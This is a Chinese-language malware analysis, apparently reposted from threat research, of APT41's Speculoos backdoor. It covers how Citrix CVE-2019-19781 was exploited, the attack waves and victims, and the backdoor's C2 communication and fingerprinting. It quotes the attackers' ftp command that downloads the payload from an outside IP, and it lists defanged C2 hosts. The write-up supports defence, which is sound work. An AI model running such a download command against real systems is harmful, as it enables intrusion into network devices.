如何进行APT41 Speculoos后门分析

这篇文章将为大家详细讲解有关如何进行APT41 Speculoos后门分析，文章内容质量较高，因此小编分享给大家做个参考，希望大家阅读完这篇文章后对相关知识有一定的了解。

2020年3月25日，FireEye发表了APT41全球攻击活动报告。此攻击活动发生在1月20日至3月11日期间，主要对Citrix，Cisco和Zoho网络设备进行攻击。研究人员根据WildFire和AutoFocus数据获得了针对Citrix设备的攻击样本'Speculoos'，还确定了北美，南美和欧洲等世界各地多个行业的受害者。

Speculoos的基于FreeBSD实现的，共识别出五个样本，所有样本文件大小基本相同，样本集之间存在微小差异。Speculoos利用CVE-2019-19781进行攻击传播，CVE-2019-19781影响Citrix Application Delivery Controller，Citrix Gateway和Citrix SD-WAN WANOP等设备，允许攻击者远程执行任意命令。

攻击细节

攻击者利用CVE-2019-19781远程执行命令：'/usr/bin/ftp -o /tmp/bsd ftp://test：[redacted]\@ 66.42.98[.]220/'。

第一波攻击始于2020年1月31日晚上，使用的文件名为bsd，影响了美国的多个高等教育机构，美国医疗机构和爱尔兰咨询公司。第二波攻击始于2020年2月24日，使用文件名为un，影响了哥伦比亚高等教育机构，奥地利制造组织，美国高等教育机构以及美国的州政府。

基于BSD系统的恶意软件相对少见，此工具和特定Citrix网络设备有关，因此Speculoos很可能是APT41组织专为此攻击活动研发的。

二进制分析

Speculoos后门是使用GCC 4.2.1编译的ELF可执行文件，可在FreeBSD系统上运行。 该负载无法保持持对目标持久控制，因此攻击者会使用额外的组件或其他攻击手段维持控制。 后门执行后将进入循环，该循环调用函数通过443端口与C2域进行通信：

alibaba.zzux[.]com (119.28.139[.]120)

如果无法通信，Speculoos会尝试通过443端口与119.28.139[.]20上的备份C2通信。如果连接到任一C2服务器，它将与服务器进行TLS握手。 图1显示了发送到C2服务器的数据包。

它请求login.live [.] com作为Server Name Indication（SNI）。

成功连接到C2并完成TLS握手后，Speculoos将对目标系统进行指纹识别，并将数据发送回C2服务器。其结构如下表1所示。

数据通过TLS通道发送，并且Speculoos会等待服务器的两字节响应。 收到响应后，它将向C2发送一个字节（0xa），并进入循环等待命令。 表2为攻击者可执行命令， 可让攻击者完全控制受害者系统。

研究中分析的两个Speculoos样本在功能上相同，两者之间只有八个字节不同，在收集系统信息时'hostname'和'uname -s'命令不同导致。uname -s返回内核信息，hostname返回主机系统名称。 下图显示了两个Speculoos样本之间的二进制比较。

影响评估

互联网可访问设备允许未经授权的用户远程执行代会带来很大的安全问题，CVE-2019-19781影响了多个面向互联网的设备，攻击者积极利用此漏洞来安装自定义后门。受影响组织大量的网络活动都必须经过这些网络设备，攻击者可以监视或修改整个组织的网络活动。

默认情况下通过这些设备可以直接访问组织系统内部，攻击者无需考虑内部网络横向移动的问题。攻击者可以修改网络流量，注入恶意代码，执行中间人攻击，或将用户重定向到虚假登录页面来收集登录凭证。

关于如何进行APT41 Speculoos后门分析就分享到这里了，希望以上内容可以对大家有一定的帮助，可以学到更多知识。如果觉得文章不错，可以把它分享出去让更多的人看到。